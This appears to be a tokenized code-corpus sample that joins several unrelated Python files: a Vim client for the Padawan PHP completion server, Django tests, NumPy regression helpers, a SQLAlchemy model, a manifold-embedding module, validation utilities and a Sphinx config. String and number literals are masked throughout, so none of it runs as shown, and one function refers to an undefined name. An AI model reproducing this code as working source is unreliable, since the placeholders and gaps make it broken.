<NUM_LIT:1> : <EOL> chunk = s . recv ( BUFFER_SIZE ) <EOL> if not chunk : <EOL> break <EOL> response += chunk <EOL> result = json . 
loads ( response ) <EOL> if "<STR_LIT:error>" in result : <EOL> raise Exception ( result [ "<STR_LIT:error>" ] ) <EOL> return result <EOL> class Editor : <EOL> def prepare ( self , message ) : <EOL> return message . replace ( "<STR_LIT:'>" , "<STR_LIT>" ) <EOL> def log ( self , message ) : <EOL> vim . command ( "<STR_LIT>" % self . prepare ( message ) ) <EOL> def notify ( self , message ) : <EOL> vim . command ( "<STR_LIT>" % self . prepare ( message ) ) <EOL> def progress ( self , progress ) : <EOL> bars = int ( progress / <NUM_LIT:5> ) <EOL> barsStr = '<STR_LIT>' <EOL> for i in range ( <NUM_LIT:20> ) : <EOL> if i < bars : <EOL> barsStr += '<STR_LIT:=>' <EOL> else : <EOL> barsStr += '<STR_LIT:U+0020>' <EOL> barsStr = '<STR_LIT:[>' + barsStr + '<STR_LIT:]>' <EOL> vim . command ( <EOL> "<STR_LIT>" + barsStr + '<STR_LIT:U+0020>' + str ( progress ) + "<STR_LIT>" <EOL> ) <EOL> return <EOL> def error ( self , error ) : <EOL> self . notify ( error ) <EOL> def callAfter ( self , timeout , callback ) : <EOL> time . sleep ( timeout ) <EOL> while callback ( ) : <EOL> time . sleep ( timeout ) <EOL> server = Server ( ) <EOL> editor = Editor ( ) <EOL> pathError = '''<STR_LIT>''' <EOL> class PadawanClient : <EOL> def GetCompletion ( self , filepath , line_num , column_num , contents ) : <EOL> curPath = self . GetProjectRoot ( filepath ) <EOL> params = { <EOL> '<STR_LIT>' : filepath . replace ( curPath , "<STR_LIT>" ) , <EOL> '<STR_LIT>' : line_num , <EOL> '<STR_LIT>' : column_num , <EOL> '<STR_LIT:path>' : curPath , <EOL> '<STR_LIT:data>' : contents <EOL> } <EOL> result = self . DoRequest ( '<STR_LIT>' , params , contents ) <EOL> if not result : <EOL> return { "<STR_LIT>" : [ ] } <EOL> return result <EOL> def GetClassesList ( self , cwd ) : <EOL> params = { <EOL> '<STR_LIT:path>' : cwd <EOL> } <EOL> return self . DoRequest ( "<STR_LIT:list>" , params ) <EOL> def SaveIndex ( self , filepath ) : <EOL> return self . 
DoRequest ( '<STR_LIT>' , { '<STR_LIT>' : filepath } ) <EOL> def DoRequest ( self , command , params , data = '<STR_LIT>' , tries = <NUM_LIT:1> ) : <EOL> try : <EOL> return server . sendRequest ( command , params ) <EOL> except socket . error as e : <EOL> if tries > <NUM_LIT:3> : <EOL> editor . error ( "<STR_LIT>" ) <EOL> else : <EOL> self . StartServer ( ) <EOL> return self . DoRequest ( command , params , tries + <NUM_LIT:1> ) <EOL> except Exception as e : <EOL> editor . error ( "<STR_LIT>" . format ( e . message ) ) <EOL> return False <EOL> def AddPlugin ( self , plugin ) : <EOL> composerCommand = composer + '<STR_LIT>' <EOL> command = '<STR_LIT>' . format ( <EOL> composerCommand , <EOL> cli , <EOL> plugin <EOL> ) <EOL> stream = subprocess . Popen ( <EOL> command , <EOL> shell = True , <EOL> stdout = subprocess . PIPE , <EOL> stderr = subprocess . STDOUT <EOL> ) <EOL> def OnAdd ( retcode ) : <EOL> if not retcode : <EOL> server . restart ( ) <EOL> editor . notify ( "<STR_LIT>" ) <EOL> else : <EOL> if retcode == <NUM_LIT> : <EOL> editor . error ( pathError ) <EOL> editor . error ( "<STR_LIT>" ) <EOL> def LogAdding ( ) : <EOL> retcode = stream . poll ( ) <EOL> if retcode is not None : <EOL> return OnAdd ( retcode ) <EOL> line = stream . stdout . readline ( ) <EOL> editor . log ( line ) <EOL> return True <EOL> editor . callAfter ( <NUM_LIT> , LogAdding ) <EOL> def RemovePlugin ( self , plugin ) : <EOL> composerCommand = composer + '<STR_LIT>' <EOL> command = '<STR_LIT>' . format ( <EOL> composerCommand , <EOL> plugin <EOL> ) <EOL> stream = subprocess . Popen ( <EOL> command , <EOL> shell = True , <EOL> stdout = subprocess . PIPE , <EOL> stderr = subprocess . STDOUT <EOL> ) <EOL> def onRemoved ( ) : <EOL> subprocess . Popen ( <EOL> '<STR_LIT>' . format ( <EOL> cli + '<STR_LIT>' + plugin <EOL> ) , <EOL> shell = True , <EOL> stdout = subprocess . PIPE , <EOL> stderr = subprocess . STDOUT <EOL> ) . wait ( ) <EOL> self . RestartServer ( ) <EOL> return editor . 
notify ( "<STR_LIT>" ) <EOL> def LogRemoving ( ) : <EOL> retcode = stream . poll ( ) <EOL> if retcode is not None : <EOL> return onRemoved ( ) <EOL> line = stream . stdout . readline ( ) <EOL> editor . log ( line ) <EOL> return True <EOL> editor . callAfter ( <NUM_LIT> , LogRemoving ) <EOL> def Generate ( self , filepath ) : <EOL> curPath = self . GetProjectRoot ( filepath ) <EOL> stream = subprocess . Popen ( <EOL> '<STR_LIT>' + curPath + '<STR_LIT>' + cli + '<STR_LIT>' , <EOL> shell = True , <EOL> stdout = subprocess . PIPE , <EOL> stderr = subprocess . STDOUT <EOL> ) <EOL> def onGenerationEnd ( retcode ) : <EOL> if retcode > <NUM_LIT:0> : <EOL> if retcode == <NUM_LIT> : <EOL> editor . error ( pathError ) <EOL> else : <EOL> editor . error ( "<STR_LIT>" . format ( str ( retcode ) ) ) <EOL> return <EOL> server . restart ( ) <EOL> editor . progress ( <NUM_LIT:100> ) <EOL> editor . notify ( "<STR_LIT>" ) <EOL> def ProcessGenerationPoll ( ) : <EOL> retcode = stream . poll ( ) <EOL> if retcode is not None : <EOL> onGenerationEnd ( retcode ) <EOL> return <EOL> line = stream . stdout . readline ( ) <EOL> errorMatch = re . search ( '<STR_LIT>' , line ) <EOL> if errorMatch is not None : <EOL> retcode = <NUM_LIT:1> <EOL> editor . error ( "<STR_LIT>" . format ( <EOL> errorMatch . group ( <NUM_LIT:1> ) . replace ( "<STR_LIT:'>" , "<STR_LIT>" ) <EOL> ) ) <EOL> return <EOL> match = re . search ( '<STR_LIT>' , line ) <EOL> if match is None : <EOL> return True <EOL> progress = int ( match . group ( <NUM_LIT:1> ) ) <EOL> editor . progress ( progress ) <EOL> return True <EOL> editor . callAfter ( <NUM_LIT> , ProcessGenerationPoll ) <EOL> def StartServer ( self ) : <EOL> server . start ( ) <EOL> def StopServer ( self ) : <EOL> server . stop ( ) <EOL> def RestartServer ( self ) : <EOL> server . restart ( ) <EOL> def GetProjectRoot ( self , filepath ) : <EOL> curPath = path . dirname ( filepath ) <EOL> while curPath != '<STR_LIT:/>' and not path . exists ( <EOL> path . 
join ( curPath , '<STR_LIT>' ) <EOL> ) : <EOL> curPath = path . dirname ( curPath ) <EOL> if curPath == '<STR_LIT:/>' : <EOL> curPath = path . dirname ( filepath ) <EOL> return curPath <EOL> client = PadawanClient ( ) </s>
<s> "<STR_LIT>" <EOL> from __future__ import unicode_literals <EOL> import random <EOL> import string <EOL> from django . core . cache import cache <EOL> from django . test import TestCase <EOL> from . . models import Section , Size , Placement <EOL> class AdCodeDataTestCase ( TestCase ) : <EOL> "<STR_LIT>" <EOL> def tearDown ( self ) : <EOL> cache . clear ( ) <EOL> def get_random_string ( self , length = <NUM_LIT:10> ) : <EOL> return '<STR_LIT>' . join ( random . choice ( string . ascii_letters ) for x in range ( length ) ) <EOL> def create_section ( self , ** kwargs ) : <EOL> "<STR_LIT>" <EOL> defaults = { <EOL> '<STR_LIT:name>' : self . get_random_string ( ) , <EOL> '<STR_LIT>' : self . get_random_string ( ) , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> defaults . update ( kwargs ) <EOL> return Section . objects . create ( ** defaults ) <EOL> def create_size ( self , ** kwargs ) : <EOL> "<STR_LIT>" <EOL> defaults = { <EOL> '<STR_LIT:name>' : self . get_random_string ( ) , <EOL> '<STR_LIT:width>' : random . randint ( <NUM_LIT:50> , <NUM_LIT:100> ) , <EOL> '<STR_LIT>' : random . randint ( <NUM_LIT:50> , <NUM_LIT:100> ) , <EOL> } <EOL> defaults . update ( kwargs ) <EOL> return Size . objects . create ( ** defaults ) <EOL> def create_placement ( self , ** kwargs ) : <EOL> "<STR_LIT>" <EOL> defaults = { <EOL> '<STR_LIT:name>' : self . get_random_string ( ) , <EOL> '<STR_LIT>' : self . get_random_string ( ) , <EOL> '<STR_LIT>' : self . get_random_string ( ) , <EOL> } <EOL> defaults . update ( kwargs ) <EOL> if '<STR_LIT:size>' not in defaults : <EOL> defaults [ '<STR_LIT:size>' ] = self . create_size ( ) <EOL> return Placement . objects . create ( ** defaults ) </s>
<s> from django . contrib . auth import authenticate <EOL> from . base import AllAccessTestCase <EOL> class AuthBackendTestCase ( AllAccessTestCase ) : <EOL> "<STR_LIT>" <EOL> def setUp ( self ) : <EOL> self . user = self . create_user ( ) <EOL> self . access = self . create_access ( user = self . user ) <EOL> def test_successful_authenticate ( self ) : <EOL> "<STR_LIT>" <EOL> provider = self . access . provider <EOL> identifier = self . access . identifier <EOL> user = authenticate ( provider = provider , identifier = identifier ) <EOL> self . assertEqual ( user , self . user , "<STR_LIT>" ) <EOL> def test_provider_name ( self ) : <EOL> "<STR_LIT>" <EOL> provider = self . access . provider . name <EOL> identifier = self . access . identifier <EOL> user = authenticate ( provider = provider , identifier = identifier ) <EOL> self . assertEqual ( user , self . user , "<STR_LIT>" ) <EOL> def test_failed_authentication ( self ) : <EOL> "<STR_LIT>" <EOL> provider = self . access . provider <EOL> identifier = self . access . identifier <EOL> self . access . delete ( ) <EOL> user = authenticate ( provider = provider , identifier = identifier ) <EOL> self . assertEqual ( user , None , "<STR_LIT>" ) <EOL> def test_match_no_user ( self ) : <EOL> "<STR_LIT>" <EOL> self . access . user = None <EOL> self . access . save ( ) <EOL> user = authenticate ( provider = self . access . provider , identifier = self . access . identifier ) <EOL> self . assertEqual ( user , None , "<STR_LIT>" ) <EOL> def test_performance ( self ) : <EOL> "<STR_LIT>" <EOL> with self . assertNumQueries ( <NUM_LIT:1> ) : <EOL> authenticate ( provider = self . access . provider , identifier = self . access . identifier ) </s>
<s> import numpy as np <EOL> def load_data ( file_name ) : <EOL> data = np . loadtxt ( file_name , delimiter = '<STR_LIT:U+002C>' ) <EOL> X = data [ : , : - <NUM_LIT:1> ] <EOL> y = data [ : , - <NUM_LIT:1> : ] <EOL> return X , y <EOL> def transform_arguments ( tranformation ) : <EOL> def dec ( f ) : <EOL> def wrapper ( * args , ** kwargs ) : <EOL> t_args = map ( tranformation , args ) <EOL> t_kwargs = { k : tranformation ( v ) for k , v in kwargs . iteritems ( ) } <EOL> return f ( * t_args , ** t_kwargs ) <EOL> return wrapper <EOL> return dec <EOL> matrix_args = transform_arguments ( lambda arg : np . matrix ( arg , copy = False ) ) <EOL> matrix_args_array_only = transform_arguments ( lambda arg : np . matrix ( arg , copy = False ) if isinstance ( arg , np . ndarray ) else arg ) <EOL> @ matrix_args <EOL> def J_liner_regression ( X , y , theta ) : <EOL> temp = X * theta - y <EOL> return ( temp . T * temp / ( <NUM_LIT:2> * len ( y ) ) ) [ <NUM_LIT:0> , <NUM_LIT:0> ] <EOL> @ matrix_args_array_only <EOL> def gradient_descent ( cost_function , X , y , iterations , intial_theta , alpha ) : <EOL> m = len ( y ) <EOL> theta = intial_theta <EOL> J_history = [ ] <EOL> for _ in xrange ( iterations ) : <EOL> theta = theta - ( alpha / m ) * X . T * ( X * theta - y ) <EOL> J_history . append ( cost_function ( X , y , theta ) ) <EOL> return theta , J_history <EOL> def add_zero_feature ( X , axis = <NUM_LIT:1> ) : <EOL> return np . append ( np . ones ( ( X . shape [ <NUM_LIT:0> ] , <NUM_LIT:1> ) if axis else ( <NUM_LIT:1> , X . shape [ <NUM_LIT:1> ] ) ) , X , axis = axis ) <EOL> def sigmoid ( z ) : <EOL> return <NUM_LIT:1> / ( <NUM_LIT:1> + np . exp ( - z ) ) <EOL> def lr_accuracy ( X , y , theta ) : <EOL> theta = theta [ : , np . newaxis ] <EOL> temp = sigmoid ( np . dot ( X , theta ) ) . ravel ( ) <EOL> p = np . zeros ( len ( X ) ) <EOL> p [ temp >= <NUM_LIT:0.5> ] = <NUM_LIT:1> <EOL> return np . mean ( p == y . 
ravel ( ) ) * <NUM_LIT:100> <EOL> @ matrix_args <EOL> def cf_lr ( theta , X , y ) : <EOL> theta = theta . T <EOL> m = len ( y ) <EOL> Z = sigmoid ( X * theta ) <EOL> J = ( - y . T * np . log ( Z ) - ( <NUM_LIT:1> - y ) . T * np . log ( <NUM_LIT:1> - Z ) ) / m <EOL> return J [ <NUM_LIT:0> , <NUM_LIT:0> ] <EOL> @ matrix_args <EOL> def gf_lr ( theta , X , y ) : <EOL> theta = theta . T <EOL> m = len ( y ) <EOL> res = ( X . T * ( sigmoid ( X * theta ) - y ) ) / m <EOL> return res . A1 <EOL> @ matrix_args_array_only <EOL> def cf_lr_reg ( theta , X , y , lambda_coef ) : <EOL> theta = theta . T <EOL> m = len ( y ) <EOL> lambda_coef = float ( lambda_coef ) <EOL> Z = sigmoid ( X * theta ) <EOL> J = ( - y . T * np . log ( Z ) - ( <NUM_LIT:1> - y ) . T * np . log ( <NUM_LIT:1> - Z ) ) / m + ( lambda_coef / ( <NUM_LIT:2> * m ) ) * theta . T * theta <EOL> return J [ <NUM_LIT:0> , <NUM_LIT:0> ] <EOL> @ matrix_args_array_only <EOL> def gf_lr_reg ( theta , X , y , lambda_coef ) : <EOL> theta = np . matrix ( theta . T , copy = True ) <EOL> lambda_coef = float ( lambda_coef ) <EOL> m = len ( y ) <EOL> Z = X * theta <EOL> theta [ <NUM_LIT:0> , <NUM_LIT:0> ] = <NUM_LIT:0> <EOL> res = ( X . T * ( sigmoid ( Z ) - y ) ) / m + ( lambda_coef / m ) * theta <EOL> return res . A1 <EOL> def feature_normalize ( X ) : <EOL> mu = np . mean ( X , axis = <NUM_LIT:0> ) [ np . newaxis , : ] <EOL> sigma = np . std ( X , axis = <NUM_LIT:0> ) [ np . newaxis , : ] <EOL> return mu , sigma , ( X - mu ) / sigma </s>
<s> from sqlalchemy import Column <EOL> from sqlalchemy import Integer <EOL> from sqlalchemy import String <EOL> from sqlalchemy . ext . declarative import declarative_base <EOL> Base = declarative_base ( ) <EOL> class Todo ( Base ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , primary_key = True ) <EOL> task = Column ( String ( <NUM_LIT:255> ) ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> from sqlalchemy import create_engine <EOL> from settings import DB_URI <EOL> engine = create_engine ( DB_URI ) <EOL> Base . metadata . drop_all ( engine ) <EOL> Base . metadata . create_all ( engine ) </s>
<s> """<STR_LIT>""" <EOL> import warnings <EOL> import numpy as np <EOL> import scipy . sparse as sparse <EOL> from scipy . linalg import eigh , svd , qr , solve <EOL> from scipy . sparse import eye , csr_matrix <EOL> from . . embedding . base import BaseEmbedding <EOL> from . . utils . validation import check_array , check_random_state <EOL> from . . utils . eigendecomp import null_space , check_eigen_solver <EOL> def barycenter_graph ( distance_matrix , X , reg = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> ( N , d_in ) = X . shape <EOL> ( rows , cols ) = distance_matrix . nonzero ( ) <EOL> W = sparse . lil_matrix ( ( N , N ) ) <EOL> for i in range ( N ) : <EOL> nbrs_i = cols [ rows == i ] <EOL> n_neighbors_i = len ( nbrs_i ) <EOL> v = np . ones ( n_neighbors_i , dtype = X . dtype ) <EOL> C = X [ nbrs_i ] - X [ i ] <EOL> G = np . dot ( C , C . T ) <EOL> trace = np . trace ( G ) <EOL> if trace > <NUM_LIT:0> : <EOL> R = reg * trace <EOL> else : <EOL> R = reg <EOL> G . flat [ : : n_neighbors_i + <NUM_LIT:1> ] += R <EOL> w = solve ( G , v , sym_pos = True ) <EOL> W [ i , nbrs_i ] = w / np . sum ( w ) <EOL> return W <EOL> def locally_linear_embedding ( geom , n_components , reg = <NUM_LIT> , max_iter = <NUM_LIT:100> , <EOL> eigen_solver = '<STR_LIT>' , tol = <NUM_LIT> , random_state = None ) : <EOL> """<STR_LIT>""" <EOL> if geom . X is None : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if geom . adjacency_matrix is None : <EOL> geom . compute_adjacency_matrix ( ) <EOL> W = barycenter_graph ( geom . adjacency_matrix , geom . X , reg = reg ) <EOL> eigen_solver = check_eigen_solver ( eigen_solver , <EOL> size = W . shape [ <NUM_LIT:0> ] , <EOL> nvec = n_components + <NUM_LIT:1> ) <EOL> if eigen_solver != '<STR_LIT>' : <EOL> M = eye ( * W . shape , format = W . format ) - W <EOL> M = ( M . T * M ) . tocsr ( ) <EOL> else : <EOL> M = ( W . T * W - W . T - W ) . toarray ( ) <EOL> M . flat [ : : M . 
shape [ <NUM_LIT:0> ] + <NUM_LIT:1> ] += <NUM_LIT:1> <EOL> return null_space ( M , n_components , k_skip = <NUM_LIT:1> , eigen_solver = eigen_solver , <EOL> tol = tol , max_iter = max_iter , random_state = random_state ) <EOL> class LocallyLinearEmbedding ( BaseEmbedding ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , n_components = <NUM_LIT:2> , radius = None , geom = None , <EOL> eigen_solver = '<STR_LIT>' , random_state = None , <EOL> tol = <NUM_LIT> , max_iter = <NUM_LIT:100> , reg = <NUM_LIT> ) : <EOL> self . n_components = n_components <EOL> self . radius = radius <EOL> self . geom = geom <EOL> self . eigen_solver = eigen_solver <EOL> self . random_state = random_state <EOL> self . tol = tol <EOL> self . max_iter = max_iter <EOL> self . reg = reg <EOL> def fit ( self , X , y = None , input_type = '<STR_LIT:data>' ) : <EOL> """<STR_LIT>""" <EOL> X = self . _validate_input ( X , input_type ) <EOL> self . fit_geometry ( X , input_type ) <EOL> random_state = check_random_state ( self . random_state ) <EOL> self . embedding_ , self . error_ = locally_linear_embedding ( self . geom_ , <EOL> n_components = self . n_components , <EOL> eigen_solver = self . eigen_solver , <EOL> tol = self . tol , <EOL> random_state = self . random_state , <EOL> reg = self . reg , <EOL> max_iter = self . max_iter ) <EOL> return self </s>
<s> """<STR_LIT>""" <EOL> import warnings <EOL> import numbers <EOL> import numpy as np <EOL> import scipy . sparse as sp <EOL> class DataConversionWarning ( UserWarning ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> warnings . simplefilter ( "<STR_LIT>" , DataConversionWarning ) <EOL> def _assert_all_finite ( X ) : <EOL> """<STR_LIT>""" <EOL> X = np . asanyarray ( X ) <EOL> if ( X . dtype . char in np . typecodes [ '<STR_LIT>' ] and not np . isfinite ( X . sum ( ) ) <EOL> and not np . isfinite ( X ) . all ( ) ) : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" % X . dtype ) <EOL> def _shape_repr ( shape ) : <EOL> """<STR_LIT>""" <EOL> if len ( shape ) == <NUM_LIT:0> : <EOL> return "<STR_LIT>" <EOL> joined = "<STR_LIT:U+002CU+0020>" . join ( "<STR_LIT>" % e for e in shape ) <EOL> if len ( shape ) == <NUM_LIT:1> : <EOL> joined += '<STR_LIT:U+002C>' <EOL> return "<STR_LIT>" % joined <EOL> def _num_samples ( x ) : <EOL> """<STR_LIT>""" <EOL> if hasattr ( x , '<STR_LIT>' ) : <EOL> raise TypeError ( '<STR_LIT>' <EOL> '<STR_LIT>' % x ) <EOL> if not hasattr ( x , '<STR_LIT>' ) and not hasattr ( x , '<STR_LIT>' ) : <EOL> if hasattr ( x , '<STR_LIT>' ) : <EOL> x = np . asarray ( x ) <EOL> else : <EOL> raise TypeError ( "<STR_LIT>" % <EOL> type ( x ) ) <EOL> if hasattr ( x , '<STR_LIT>' ) : <EOL> if len ( x . shape ) == <NUM_LIT:0> : <EOL> raise TypeError ( "<STR_LIT>" <EOL> "<STR_LIT>" % x ) <EOL> return x . shape [ <NUM_LIT:0> ] <EOL> else : <EOL> return len ( x ) <EOL> def _ensure_sparse_format ( spmatrix , accept_sparse , dtype , copy , <EOL> force_all_finite ) : <EOL> """<STR_LIT>""" <EOL> if accept_sparse in [ None , False ] : <EOL> raise TypeError ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if dtype is None : <EOL> dtype = spmatrix . dtype <EOL> changed_format = False <EOL> if ( isinstance ( accept_sparse , ( list , tuple ) ) <EOL> and spmatrix . format not in accept_sparse ) : <EOL> spmatrix = spmatrix . 
asformat ( accept_sparse [ <NUM_LIT:0> ] ) <EOL> changed_format = True <EOL> if dtype != spmatrix . dtype : <EOL> spmatrix = spmatrix . astype ( dtype ) <EOL> elif copy and not changed_format : <EOL> spmatrix = spmatrix . copy ( ) <EOL> if force_all_finite : <EOL> if not hasattr ( spmatrix , "<STR_LIT:data>" ) : <EOL> warnings . warn ( "<STR_LIT>" <EOL> % spmatrix . format ) <EOL> else : <EOL> _assert_all_finite ( spmatrix . data ) <EOL> return spmatrix <EOL> def check_symmetric ( array , tol = <NUM_LIT> , raise_warning = True , <EOL> raise_exception = False ) : <EOL> """<STR_LIT>""" <EOL> if ( array . ndim != <NUM_LIT:2> ) or ( array . shape [ <NUM_LIT:0> ] != array . shape [ <NUM_LIT:1> ] ) : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" . format ( array . shape ) ) <EOL> if sp . issparse ( array ) : <EOL> diff = array - array . T <EOL> if diff . format not in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> diff = diff . tocsr ( ) <EOL> symmetric = np . all ( abs ( diff . data ) < tol ) <EOL> else : <EOL> symmetric = np . allclose ( array , array . T , atol = tol ) <EOL> if not symmetric : <EOL> if raise_exception : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if raise_warning : <EOL> warnings . warn ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if sp . issparse ( array ) : <EOL> conversion = '<STR_LIT:to>' + array . format <EOL> array = getattr ( <NUM_LIT:0.5> * ( array + array . T ) , conversion ) ( ) <EOL> else : <EOL> array = <NUM_LIT:0.5> * ( array + array . T ) <EOL> return array <EOL> def check_random_state ( seed ) : <EOL> """<STR_LIT>""" <EOL> if seed is None or seed is np . random : <EOL> return np . random . mtrand . _rand <EOL> if isinstance ( seed , ( numbers . Integral , np . integer ) ) : <EOL> return np . random . RandomState ( seed ) <EOL> if isinstance ( seed , np . random . 
RandomState ) : <EOL> return seed <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' % seed ) <EOL> def check_array ( array , accept_sparse = None , dtype = "<STR_LIT>" , order = None , <EOL> copy = False , force_all_finite = True , ensure_2d = True , <EOL> allow_nd = False , ensure_min_samples = <NUM_LIT:1> , ensure_min_features = <NUM_LIT:1> , <EOL> warn_on_dtype = False ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( accept_sparse , str ) : <EOL> accept_sparse = [ accept_sparse ] <EOL> dtype_numeric = dtype == "<STR_LIT>" <EOL> dtype_orig = getattr ( array , "<STR_LIT>" , None ) <EOL> if not hasattr ( dtype_orig , '<STR_LIT>' ) : <EOL> dtype_orig = None <EOL> if dtype_numeric : <EOL> if dtype_orig is not None and dtype_orig . kind == "<STR_LIT:O>" : <EOL> dtype = np . float64 <EOL> else : <EOL> dtype = None <EOL> if isinstance ( dtype , ( list , tuple ) ) : <EOL> if dtype_orig is not None and dtype_orig in dtype : <EOL> dtype = None <EOL> else : <EOL> dtype = dtype [ <NUM_LIT:0> ] <EOL> if sp . issparse ( array ) : <EOL> array = _ensure_sparse_format ( array , accept_sparse , dtype , copy , <EOL> force_all_finite ) <EOL> else : <EOL> array = np . array ( array , dtype = dtype , order = order , copy = copy ) <EOL> if ensure_2d : <EOL> if array . ndim == <NUM_LIT:1> : <EOL> if ensure_min_samples >= <NUM_LIT:2> : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % estimator_name ) <EOL> warnings . warn ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> DeprecationWarning ) <EOL> array = np . atleast_2d ( array ) <EOL> array = np . array ( array , dtype = dtype , order = order , copy = copy ) <EOL> if dtype_numeric and array . dtype . kind == "<STR_LIT:O>" : <EOL> array = array . astype ( np . float64 ) <EOL> if not allow_nd and array . ndim >= <NUM_LIT:3> : <EOL> raise ValueError ( "<STR_LIT>" <EOL> % ( array . 
ndim ) ) <EOL> if force_all_finite : <EOL> _assert_all_finite ( array ) <EOL> shape_repr = _shape_repr ( array . shape ) <EOL> if ensure_min_samples > <NUM_LIT:0> : <EOL> n_samples = _num_samples ( array ) <EOL> if n_samples < ensure_min_samples : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( n_samples , shape_repr , ensure_min_samples ) ) <EOL> if ensure_min_features > <NUM_LIT:0> and array . ndim == <NUM_LIT:2> : <EOL> n_features = array . shape [ <NUM_LIT:1> ] <EOL> if n_features < ensure_min_features : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( n_features , shape_repr , ensure_min_features ) ) <EOL> if warn_on_dtype and dtype_orig is not None and array . dtype != dtype_orig : <EOL> msg = ( "<STR_LIT>" <EOL> % ( dtype_orig , array . dtype ) ) <EOL> warnings . warn ( msg , DataConversionWarning ) <EOL> return array </s>
<s> import sys <EOL> import os <EOL> from datetime import date <EOL> import sphinx_gallery <EOL> import sphinx_bootstrap_theme <EOL> curdir = os . path . dirname ( __file__ ) <EOL> sys . path . append ( os . path . abspath ( os . path . join ( curdir , '<STR_LIT:..>' , '<STR_LIT>' ) ) ) <EOL> sys . path . append ( os . path . abspath ( os . path . join ( curdir , '<STR_LIT>' ) ) ) <EOL> import mne <EOL> import numpy_ext . numpydoc <EOL> extensions = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> extensions += [ '<STR_LIT>' ] <EOL> extensions += [ '<STR_LIT>' ] <EOL> autosummary_generate = True <EOL> autodoc_default_flags = [ '<STR_LIT>' ] <EOL> templates_path = [ '<STR_LIT>' ] <EOL> source_suffix = '<STR_LIT>' <EOL> master_doc = '<STR_LIT:index>' <EOL> project = u'<STR_LIT>' <EOL> td = date . today ( ) <EOL> copyright = u'<STR_LIT>' % ( td . year , <EOL> td . isoformat ( ) ) <EOL> version = mne . __version__ <EOL> release = version <EOL> unused_docs = [ ] <EOL> exclude_trees = [ '<STR_LIT>' ] <EOL> exclude_patterns = [ '<STR_LIT>' ] <EOL> pygments_style = '<STR_LIT>' <EOL> modindex_common_prefix = [ '<STR_LIT>' ] <EOL> html_theme = '<STR_LIT>' <EOL> html_theme_options = { <EOL> '<STR_LIT>' : '<STR_LIT:U+0020>' , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : "<STR_LIT:3>" , <EOL> '<STR_LIT>' : [ <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ] , <EOL> } <EOL> html_theme_path = sphinx_bootstrap_theme . 
get_html_theme_path ( ) <EOL> html_logo = "<STR_LIT>" <EOL> html_favicon = "<STR_LIT>" <EOL> html_static_path = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> html_show_sourcelink = False <EOL> html_show_sphinx = False <EOL> build_dev_html = bool ( int ( os . environ . get ( '<STR_LIT>' , False ) ) ) <EOL> html_context = { '<STR_LIT>' : True , '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , '<STR_LIT>' : build_dev_html } <EOL> htmlhelp_basename = '<STR_LIT>' <EOL> latex_documents = [ <EOL> ] <EOL> latex_logo = "<STR_LIT>" <EOL> latex_use_parts = True <EOL> trim_doctests_flags = True <EOL> intersphinx_mapping = { '<STR_LIT>' : None } <EOL> examples_dirs = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> gallery_dirs = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> try : <EOL> from mayavi import mlab <EOL> find_mayavi_figures = True <EOL> mlab . options . offscreen = True <EOL> except Exception : <EOL> find_mayavi_figures = False <EOL> sphinx_gallery_conf = { <EOL> '<STR_LIT>' : ( '<STR_LIT>' , ) , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : examples_dirs , <EOL> '<STR_LIT>' : gallery_dirs , <EOL> '<STR_LIT>' : find_mayavi_figures , <EOL> '<STR_LIT>' : os . path . join ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> } </s>
